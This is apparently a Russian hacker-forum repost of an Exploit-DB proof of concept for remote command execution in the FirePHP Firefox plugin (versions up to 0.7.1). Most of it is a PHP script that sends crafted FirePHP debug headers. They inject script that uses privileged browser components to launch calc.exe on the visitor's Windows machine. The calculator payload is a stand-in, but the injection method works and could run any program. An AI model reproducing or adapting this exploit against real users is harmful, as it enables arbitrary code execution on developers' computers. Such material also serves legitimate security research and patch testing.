Exploit FirePHP Firefox Plugin 0.7.1 - Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24961
Проверка EDB
  1. Пройдено
Автор
WIREGHOUL
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
null
Дата публикации
2013-04-17
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution
HTML:
# Exploit Title: Firephp firefox plugin RCE
# Date: 17/04/2013
# Exploit Author: Wireghoul
# Vendor Homepage: www.firephp.org
# Software Link:
https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/
# Version: All versions up to and including 0.7.1
# Tested on: Windows 7
# Advisory: http://www.justanotherhacker.com/advisories/JAHx132.txt

<?php
/*************************************************************
 * FirePHP Firefox plugin RCE PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы